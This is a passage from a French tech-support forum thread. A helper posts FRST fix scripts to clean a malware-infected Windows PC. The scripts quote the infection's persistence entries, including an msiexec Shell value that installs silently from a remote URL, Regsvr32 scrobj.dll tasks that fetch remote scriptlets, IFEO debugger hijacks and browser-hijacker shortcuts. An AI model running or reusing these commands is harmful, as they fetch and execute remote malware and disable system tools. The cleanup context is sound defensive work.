Modérateurs : Mods Windows, Helper
Désinstalle Norton SecurityAV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Norton Security (Disabled - Out of date) {30744133-1E94-7B35-F4A3-82A5AEF1CBAA}
Code : Tout sélectionner
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2107961085-2447656062-3244028921-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9108184 2016-11-07] (Piriform Ltd)
HKU\S-1-5-21-2107961085-2447656062-3244028921-1000\...\Run: [background_fault] => C:\Users\popomacouille\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKU\S-1-5-21-2107961085-2447656062-3244028921-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj83FdI3RTH5RWY5MTU4RYIxRYF4MUZXNTUyNdQLN8UxFq== /q [Pays US - 104.24.101.133]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
R2 SNARE; C:\Users\popomacouille\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
R2 SNAREA; C:\Users\popomacouille\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7500048 2016-09-20] (TeamViewer GmbH)
R2 VNASRE; C:\Users\popomacouille\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
R2 WANARE; C:\Users\popomacouille\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Fichier non signé] <==== ATTENTION
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
R2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [Fichier non signé]
R2 WinSAPSvc; C:\Users\popomacouille\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-15] (TODO: <公司名>) [Fichier non signé] <==== ATTENTION
R2 XTU3SERVICE; C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe [19192 2015-10-06] (Intel(R) Corporation)
S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [X] <==== ATTENTION
2017-05-16 18:05 - 2017-05-17 09:36 - 00001918 _____ C:\Users\popomacouille\Desktop\BigFarm.lnk
2017-05-15 14:43 - 2017-05-15 14:43 - 01130328 _____ (Google Inc.) C:\Users\popomacouille\Downloads\ChromeSetup.exe
2017-05-15 13:55 - 2017-05-15 13:56 - 109728848 _____ (AxBx ) C:\Users\popomacouille\Downloads\setup.exe
2017-05-15 12:22 - 2017-05-15 12:23 - 353099243 _____ C:\Users\popomacouille\Downloads\Adobe_Photoshop_CS2_f.dmg
2017-05-15 12:22 - 2017-05-15 12:22 - 01658256 _____ C:\Users\popomacouille\Downloads\CreativeCloudInstaller.dmg
2017-05-15 12:19 - 2017-05-15 14:30 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-05-15 12:19 - 2017-05-15 12:19 - 00000000 ____D C:\ProgramData\Adobe
2017-05-15 12:18 - 2017-05-15 12:18 - 00674480 _____ (Adobe Systems Incorporated) C:\Users\popomacouille\Downloads\CreativeCloudSet-Up.exe
2017-05-15 12:18 - 2017-05-15 12:18 - 00000000 ____D C:\Users\popomacouille\AppData\Local\Adobe
2017-05-15 09:53 - 2017-05-15 09:53 - 00000000 ____D C:\Users\popomacouille\AppData\Local\CWASRE
2017-05-11 17:04 - 2017-05-15 14:59 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 17:03 - 2017-05-15 14:59 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 17:02 - 2017-05-11 17:03 - 00000000 ____D C:\Users\popomacouille\AppData\Local\NPASRE
2017-05-10 02:38 - 2017-05-10 02:38 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-09 20:45 - 2017-05-15 14:59 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-09 18:47 - 2017-05-09 18:47 - 00000000 ____D C:\Users\popomacouille\AppData\Local\VNASRE
2017-05-08 18:28 - 2017-05-08 18:28 - 00000000 ____D C:\Users\popomacouille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Montage Photo 2017
2017-05-08 18:27 - 2017-05-08 18:27 - 25759760 _____ (logiciel-montage-photo ) C:\Users\popomacouille\Downloads\montage-photo-601.exe
2017-05-08 14:21 - 2017-05-08 14:21 - 00000000 ____D C:\Users\popomacouille\AppData\Local\Bookness
2017-05-08 14:20 - 2017-05-08 14:21 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-08 14:20 - 2017-05-08 14:20 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-08 14:20 - 2017-05-08 14:20 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-08 14:20 - 2017-05-08 14:20 - 00000000 ____D C:\Program Files (x86)\Bookness
2017-05-08 13:20 - 2017-05-08 13:20 - 00000000 ____D C:\Users\popomacouille\AppData\Local\ANSARE
2017-05-05 11:58 - 2017-05-05 11:58 - 00000000 ____D C:\Users\popomacouille\AppData\Local\WANARE
2017-05-05 11:58 - 2017-05-05 11:58 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 19:41 - 2017-05-09 20:45 - 00000000 ____D C:\Users\popomacouille\AppData\Local\background_fault
2017-05-03 17:55 - 2017-05-15 14:59 - 00000000 _____ C:\Windows\SysWOW64\1111111
Task: {0252F9C8-E497-47D8-80CD-AD30A87AF2B1} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
Task: {3B8B3714-A70E-4E47-8878-E9257D97123D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-11-07] (Piriform Ltd)
Task: {50337E16-D4A8-494F-8CDC-0D97CD1B9225} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
C:\Program Files (x86)\MIO
2017-05-03 17:55 - 2017-05-05 11:58 - 00003520 _____ C:\Windows\System32\Tasks\Windows-PG
2017-05-03 17:55 - 2017-05-04 19:41 - 00000000 ____D C:\Windows\psgo
2017-05-03 17:55 - 2017-05-03 17:55 - 00000000 ____D C:\Users\popomacouille\AppData\Local\SNAREA
2017-05-02 13:36 - 2017-05-15 09:54 - 00003612 _____ C:\Windows\System32\Tasks\Milimili
2017-05-02 13:36 - 2017-05-15 09:53 - 00000000 ____D C:\Users\popomacouille\AppData\Roaming\WinSAPSvc
2017-05-02 13:36 - 2017-05-02 17:51 - 00000000 ____D C:\Users\popomacouille\AppData\Local\SNARE
2017-05-02 13:36 - 2017-05-02 13:36 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-30 21:55 - 2017-04-30 21:55 - 00088699 _____ C:\Users\popomacouille\Downloads\game-of-thrones-s06e04-french-bluray-720p-hdtv (1).torrent
2017-04-26 18:25 - 2017-05-17 00:57 - 00000080 _____ C:\Users\popomacouille\AppData\Local剜捯獫慴慇敭屳呇⁁屖湥楴汴浥湥湩潦
2017-04-26 16:15 - 2017-04-26 16:15 - 00000000 ____D C:\Windows\system32\log
Shortcut: C:\Users\popomacouille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\popomacouille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.)
Task: {E33D85D7-61BD-4BF5-A5F7-19200FD04EB0} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj83FdI3RTH5RWY5MTU4RYIxRYF4MUZXNTUyNdQLN8UxFq== scrobj.dll
ShortcutWithArgument: C:\Users\popomacouille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493740281&z=63ba39409d89bee0623aa0bg4z0t3c2m9z5eeobbfc&from=ypid&uid=SamsungXSSDX850XEVOX500GB_S2RBNX0H447970D
ShortcutWithArgument: C:\Users\popomacouille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493740281&z=63ba39409d89bee0623aa0bg4z0t3c2m9z5eeobbfc&from=ypid&uid=SamsungXSSDX850XEVOX500GB_S2RBNX0H447970D
ShortcutWithArgument: C:\Users\popomacouille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493740281&z=63ba39409d89bee0623aa0bg4z0t3c2m9z5eeobbfc&from=ypid&uid=SamsungXSSDX850XEVOX500GB_S2RBNX0H447970D
2017-04-26 16:15 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-26 16:15 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-04-25 18:18 - 2017-04-25 18:56 - 00000000 ____D C:\Users\popomacouille\Documents\dragoon
2017-04-24 19:35 - 2017-04-24 19:35 - 149781056 _____ (Zenimax Online Studios) C:\Users\popomacouille\Downloads\Install_ESO (2).exe
2017-04-22 01:42 - 2017-05-11 17:25 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 16:12 - 2017-05-03 17:55 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-20 16:11 - 2017-05-15 14:59 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-19 11:40 - 2017-05-17 07:25 - 00000000 ____D C:\Users\popomacouille\AppData\Local\3DM
2017-04-18 16:15 - 2017-05-17 07:56 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-18 16:15 - 2017-05-17 07:40 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-18 16:15 - 2017-05-17 07:25 - 00000000 ____D C:\Users\popomacouille\AppData\Local\Kitty
2017-04-18 16:15 - 2017-05-17 06:51 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-18 16:15 - 2017-05-15 20:33 - 00000000 ____D C:\Users\popomacouille\AppData\LocalLow\Mozilla
2017-04-18 16:15 - 2017-04-18 16:15 - 00002004 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-18 16:15 - 2017-04-18 16:15 - 00001934 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-18 16:15 - 2017-04-18 16:15 - 00000000 ____D C:\Users\popomacouille\AppData\Roaming\Mozilla
2017-04-18 16:15 - 2017-04-18 16:15 - 00000000 ____D C:\Users\popomacouille\AppData\Roaming\Firefox
2017-04-18 16:15 - 2017-04-18 16:15 - 00000000 ____D C:\Users\popomacouille\AppData\Local\Hotben
2017-04-18 16:15 - 2017-04-18 16:15 - 00000000 ____D C:\Users\popomacouille\AppData\Local\Firefox
2017-04-18 16:15 - 2017-04-18 16:15 - 00000000 ____D C:\ProgramData\Windows
2017-04-18 16:15 - 2017-04-18 16:15 - 00000000 ____D C:\Program Files (x86)\Hotben
2017-04-18 16:11 - 2017-05-11 17:24 - 00000000 ____D C:\Program Files (x86)\BiaoJi
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Code : Tout sélectionner
CreateRestorePoint:
CloseProcesses:
S2 ANSARE; C:\Users\popomacouille\AppData\Local\ANSARE\Snare.dll [X]
S2 BIT; C:\ProgramData\BIT\BIT.dll [X]
S2 CWASRE; C:\Users\popomacouille\AppData\Local\CWASRE\Snare.dll [X]
S2 NPASRE; C:\Users\popomacouille\AppData\Local\NPASRE\Snare.dll [X]
Task: {7629B6F8-7BE1-4A71-908A-07197F4F1F67} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj83FdI3RTH5RWY5MTU4RYIxRYF4MUZXNTUyNdQLN8UxFq== scrobj.dll
ShortcutWithArgument: C:\Users\popomacouille\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495010013&z=049e8e40fb3d5005ef581f2g0z4tew6e5g9e6e4g2m&from=che0812&uid=SamsungXSSDX850XEVOX500GB_S2RBNX0H447970D
Hosts:
EmptyTemp:
RemoveProxy:
Reboot: